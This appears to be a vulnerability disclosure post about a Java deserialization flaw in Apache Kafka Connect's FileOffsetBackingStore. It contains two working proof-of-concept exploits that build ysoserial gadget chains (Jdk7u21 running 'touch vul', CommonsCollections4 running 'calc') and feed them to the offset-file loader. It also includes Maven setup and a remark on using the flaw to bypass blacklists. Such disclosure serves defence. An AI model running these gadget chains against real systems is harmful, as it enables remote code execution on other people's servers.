Apache Kafka Deserialization Vulnerability

The author provided the vulnerability PoC directly: "CVE-IDs request for Apache Kafka deserialization vulnerability via runtime"

import junit.framework.TestCase;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.Jdk7u21;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

// Wrapper class added so the snippet compiles as a JUnit test; the class name is arbitrary.
public class KafkaDeserPoC extends TestCase {

    public void test_Kafka_Deser() throws Exception {
        StandaloneConfig config;
        String projectDir = System.getProperty("user.dir");

        // Generate a ysoserial Jdk7u21 gadget chain and write it to disk as the "offset file".
        Jdk7u21 jdk7u21 = new Jdk7u21();
        Object o = jdk7u21.getObject("touch vul");

        byte[] ser = serialize(o);

        File tempFile = new File(projectDir + "/payload.ser");
        FileUtils.writeByteArrayToFile(tempFile, ser);

        // Point the standalone worker config's offset storage file at the payload.
        Map<String, String> props = new HashMap<String, String>();
        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG, tempFile.getAbsolutePath());
        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        config = new StandaloneConfig(props);

        // start() reads the offset file back in with ObjectInputStream, triggering the gadget chain.
        FileOffsetBackingStore restore = new FileOffsetBackingStore();
        restore.configure(config);
        restore.start();
    }

    private byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bout);
        out.writeObject(object);
        out.flush();
        return bout.toByteArray();
    }
}

I checked with our developers, who said this class does not appear in their own code. This deserialization entry point should also be usable to bypass some blacklists, much like the MarshalledObject class is used to bypass WebLogic's blacklist.

A global search shows that the same vulnerable pattern also appears in the test cases of the Kafka source tree. I am not sure whether this class has other usage scenarios; happy to discuss.

[Figure: FileOffsetBackingStore.png]
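The deserialization itself happens when start() loads the configured offset file back in. A minimal sketch of that pattern (the class and method names below are my own illustration, not the exact Kafka source):

import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class OffsetFileLoadSketch {
    // start() ends up reading the configured offset file with ObjectInputStream.
    static Object loadOffsets(File offsetFile) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new FileInputStream(offsetFile))) {
            // readObject() on attacker-controlled bytes fires any gadget chain
            // present on the classpath (Jdk7u21, CommonsCollections4, ...).
            return in.readObject();
        }
    }
}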

Set up an environment to test:

package ysoserial.exploit;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.CommonsCollections4;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

public class KafkaExploitTest {
    public static void test_Kafka_Deser() throws Exception {
        StandaloneConfig config;
        String projectDir = System.getProperty("user.dir");
        CommonsCollections4 cc4 = new CommonsCollections4();
        Object o = cc4.getObject("calc");

        byte[] ser = serialize(o);

        File tempFile = new File(projectDir + "/payload.ser");
        FileUtils.writeByteArrayToFile(tempFile, ser);

        Map<String, String> props = new HashMap<String, String>();
        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG, tempFile.getAbsolutePath());
        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        config = new StandaloneConfig(props);

        FileOffsetBackingStore restore = new FileOffsetBackingStore();
        restore.configure(config);
        restore.start();
    }

    private static byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bout);
        out.writeObject(object);
        out.flush();
        return bout.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        KafkaExploitTest.test_Kafka_Deser();
    }
}

Add the dependencies to pom.xml:

<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-runtime -->
<dependency>
    <groupId>org.apache.kafka</groupId>
    <artifactId>connect-runtime</artifactId>
    <version>0.11.0.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-json -->
<dependency>
    <groupId>org.apache.kafka</groupId>
    <artifactId>connect-json</artifactId>
    <version>0.11.0.0</version>
    <scope>test</scope>
</dependency>
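The exploit class above is declared in the ysoserial.exploit package, so it is easiest to compile inside the ysoserial source tree, which already ships the dependencies the CommonsCollections4 gadget chain needs. If you build it as a standalone project instead, the gadget library itself also has to be on the classpath; a sketch of that extra dependency (version 4.0 is the one ysoserial's CommonsCollections4 payload targets, to my recollection):

<!-- Only needed outside the ysoserial tree: gadget library for the CommonsCollections4 payload -->
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>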

[Figure: calc.png]

Vulnerability demo (from Kafka's own test case):

   @Test
   public void testSaveRestore() throws Exception {
       Callback<Void> setCallback = expectSuccessfulSetCallback();
       Callback<Map<ByteBuffer, ByteBuffer>> getCallback = expectSuccessfulGetCallback();
       PowerMock.replayAll();

       store.set(firstSet, setCallback).get();
       store.stop();

       // Restore into a new store to ensure correct reload from scratch
       FileOffsetBackingStore restore = new FileOffsetBackingStore();
       restore.configure(config);
       restore.start();
       Map<ByteBuffer, ByteBuffer> values = restore.get(Arrays.asList(buffer("key")), getCallback).get();
       assertEquals(buffer("value"), values.get(buffer("key")));

       PowerMock.verifyAll();
   }
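For contrast, the write side of this round trip (store.set(...) followed by stop()) also uses plain JDK serialization: a legitimate offset file is essentially a serialized HashMap of byte arrays. A minimal sketch of that idea as I understand the 0.11.x code (my own illustration, not the Kafka source):

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;

public class OffsetFileSaveSketch {
    // A legitimate offset file holds a serialized HashMap<byte[], byte[]>.
    // On load, readObject() runs before any cast back to a map, so swapping the
    // file for a gadget chain still executes the gadget.
    static void saveOffsets(String path, HashMap<byte[], byte[]> offsets) throws IOException {
        try (ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(path))) {
            out.writeObject(offsets);
        }
    }
}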

Business data is mostly serialized with Avro or JSON; only if JDK native serialization is used would this function be the one doing the deserialization.
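Worth noting for real-world exposure: Kafka Connect in standalone mode uses FileOffsetBackingStore for its offsets, with the file location set by offset.storage.file.filename. An excerpt from the distribution's config/connect-standalone.properties (values quoted from memory, treat them as an assumption):

# config/connect-standalone.properties (excerpt)
bootstrap.servers=localhost:9092
key.converter=org.apache.kafka.connect.json.JsonConverter
value.converter=org.apache.kafka.connect.json.JsonConverter
# This file is deserialized with ObjectInputStream when the worker starts,
# so whoever can overwrite it controls what gets deserialized.
offset.storage.file.filename=/tmp/connect.offsets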

Tags: deserialization vulnerability, Apache Kafka, kafka
